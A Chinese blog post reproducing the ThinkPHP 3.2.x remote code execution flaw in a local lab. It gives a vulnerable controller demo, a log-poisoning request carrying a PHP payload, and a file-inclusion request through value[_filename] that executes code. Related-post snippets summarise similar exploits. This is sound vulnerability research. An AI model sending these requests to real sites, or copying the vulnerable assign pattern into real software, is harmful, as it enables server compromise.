ThinkPHP 3.2.x RCE漏洞复现

最新推荐文章于 2024-07-29 05:30:32 发布
最新推荐文章于 2024-07-29 05:30:32 发布
阅读量7.2k 收藏 3
点赞数 1
文章标签: 安全漏洞 thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43697234/article/details/118931542
版权
本文详细介绍了ThinkPHP3.2版本的远程代码执行(RCE)漏洞,包括漏洞产生的原因、复现环境的搭建以及具体步骤。通过在Controller中使用模板赋值方法assign,当第一个参数可控时,可以导致文件包含,从而执行恶意代码。复现过程涉及创建log文件并利用其执行phpinfo(),以及包含任意文件实现代码执行。此漏洞影响安全,应及时修复。
摘要由CSDN通过智能技术生成

ThinkPHP 3.2.x RCE漏洞复现

漏洞介绍

ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。

漏洞复现

复现环境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10
一、 搭建环境:
在ThinkPHP的Application\Home\Controller\IndexController.class.php
目录下写入模板赋值assign的 Demo
Demo:

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($value=''){
        $this->assign($value);
        $this->display();
    }
}

在这里插入图片描述
写入demo后需要在view下创建一个index文件进行视图渲染
目录:\Application\Home\View\Index\index.html

Log记录目录:
若开启debug模式日志会到:\Application\Runtime\Logs\Home\下
若未开启debug模式日志会到:\Application\Runtime\Logs\Common\下

二、 漏洞利用
1、创建log文件

http://127.0.0.1/thinkphp/index.php?m=--><?=phpinfo();?>

在这里插入图片描述
2、包含log文件

http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/common/21_07_12.log

在这里插入图片描述

3、上传具有恶意代码的任何文件到服务器上,直接包含其文件相对或绝对路径即可。
例如:http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./[filename]

参考链接

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

Sh1ro4
关注
thinkPHP3.x日志泄露漏洞复现
千寻的博客
12-18 3190
漏洞名称 thinkPHP3.x日志泄露 漏洞描述 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关 ThinkPHP默认安装后,也会在Runtime目录下生成日志 日志很容易被猜解到,而且日志里面有执行SQL语句的记录 影响版本 thinkPHP3.2 thinkPHP3. 漏洞分析 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3.1结构:Runti
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 2059
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
thinkphp框架远程代码执行
最新发布
m0_68976043的博客
07-29 373
一定添加--privileged不然只能拉取环境首页不显示。二、thinkphp远程代码执行。vulfocus网上自行下载。
thinkphp3.2.x 代码执行
qq_23003811的博客
07-15 436
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。1、构造payload:/index.php?
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP 3.2.x RCE漏洞
m0_65150886的博客
01-29 450
ThinkPHP是一个开源免费的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。Thinkphp在国内拥有庞大的用户群体,其中不乏关键基础设施用户。ThinkPHP 3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。1.访问http://ip:port,出现如下页面,开始实验。2.通过burp抓包,修改get请求,创建log文件。
漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2258
thinkphp-命令执行】日志包含
ThinkPHP 漏洞利用工具
Websec
05-18 6337
当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。 01、TPscan 一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。 github项目地址: https://github.com/Lucifer1993/TPscan 02、Aazhen-V3.1 支持ThinkPHP 2.x RCEThinkphp5 5.0.22/5.1.29RCEThinkPHP5
漏洞复现ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4421
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
Thinkphp 2-rce 漏洞复现(vulhub)
MDSEC的博客
08-20 265
首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录,打开。
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7343
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class....
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 1870
vulfocus靶场
thinkphp3.2 EXP BUG
tw198511的博客
11-05 577
官方文档说EXP不区分大小写,我修改数据的时候刚好用了大写就报错了。 看了下源码发现的driver.class.php里面parseSet函数没兼容大写,查询的时候是有兼容大写的 [code="java"] protected function parseSet($data) { foreach ($data as $key=>$val){ if(...
ThinkPHP 2.x/3.0 漏洞复现
Knsec
06-04 1884
ThinkPHP 2.x/3.0漏洞复现
thinkphp3.2.x】thinkphp3.2.x中有关file文件缓存相关的文件
PHP在线开发笔记
07-19 3347
一、file文件缓存类文件:'mytp\ThinkPHP\Library\Think\Cache\Driver\File.class.php' <?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK IT ] /
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值